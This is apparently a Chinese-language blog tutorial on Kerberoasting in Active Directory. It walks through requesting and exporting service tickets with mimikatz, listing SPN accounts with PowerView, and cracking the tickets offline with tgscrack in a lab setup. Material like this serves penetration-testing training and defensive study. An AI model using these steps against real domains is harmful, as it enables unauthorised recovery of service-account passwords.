Kerberoasting 离线爆破攻击

当域用户请求某个域内服务后,kdc 通常会返回一个加密的 st 服务票据,此 st 服务票据被服务 hash 加密,当我们将使用密码字典派生的多个 hash 值来尝试解密 st 服务票据,如果能够揭秘成功,则说明字典中存在目标服务账号的密码。

Kerberoasting 对比 AS-REP Roasting

  • Kerberoasting 利用后获得服务账户密码,AS-REP Roasting 利用后获得发起请求的域用户的密码。

  • Kerberoasting 使用字典爆破 st 服务票据,AS-REP Roasting 使用字典爆破 Logon Session Key。

  • Kerberoasting 需要攻击者具有请求 st 的凭据(某个域用户即可),AS-REP Roasting 需要攻击者枚举出域中 "不要求 kerberos 预身份验证" 的用户。

环境搭建

为管理员 administrator 注册一个 spn,目的是为了 administrator 映射为某个服务的服务账户。

复制代码
setspn -S MySQL/WIN-0v0GAORDC17:3306/MySQL administrator

漏洞利用

  1. 查询域内注册 spn 的用户。工具:PowerView.ps1 ,项目地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
复制代码
Import-Module .\PowerView.ps1 
Get-NetUser -SPN
  1. 使用某个域用户凭据请求这个 spn 对应服务的 st 服务票据。工具:mimikatz
复制代码
kerberos::ask /target:MySQL/WIN-0v0GAORDC17:3306/MySQL
​
# 这里我用来请求 st 的凭据时 administrator管理员,其实其他域用户凭据也可以,只要能请求到 st 就可以。
  1. 导出请求到的 st 服务票据。工具:mimikatz
复制代码
kerberos::list /export
  1. 使用字典进行离线爆破。工具:tgscrack ,项目地址:https://github.com/leechristensen/tgscrack
复制代码
# 先使用 python 脚本提取出 st 服务票据的加密部分,并导出到 /tmp/myhash.txt 路径下
python2 extractServiceTicketParts.py ticket.kirbi > /tmp/myhash.txt
​
# 再使用 tgscrack.go 进行离线爆破
go run tgscrack.go -hashfile /tmp/myhash.txt -wordlist /tmp/password.txt
相关推荐
2501_9159090618 分钟前
tcpdump 抓包数据分析实战,命令、过滤、常见故障定位与真机补充流程
网络·测试工具·ios·小程序·uni-app·iphone·tcpdump
Y编程小白1 小时前
PostgreSQL在Linux中的部署和安装教程
数据库·postgresql
路由侠内网穿透1 小时前
本地部署开源持续集成和持续部署系统 Woodpecker CI 并实现外部访问
服务器·网络·windows·ci/cd·开源
wfsec2 小时前
EDI许可证:企业数字化转型的“安全基石”与“信任通行证”
安全
CsharpDev-奶豆哥2 小时前
ASP.NET中for和foreach使用指南
windows·microsoft·c#·asp.net·.net
光储圈2 小时前
光伏安全协议-安全责任协议书8篇
网络·安全
你的人类朋友2 小时前
什么是断言?
前端·后端·安全
FIN66683 小时前
昂瑞微:实现精准突破,攻坚射频“卡脖子”难题
前端·人工智能·安全·前端框架·信息与通信
TiAmo zhang3 小时前
SQL Server 2019实验 │ 数据库和表的创建、修改与删除
数据库·oracle
时空潮汐3 小时前
神卓 N600:内网穿透需求的高效安全之选
网络·安全·群晖nas·神卓n600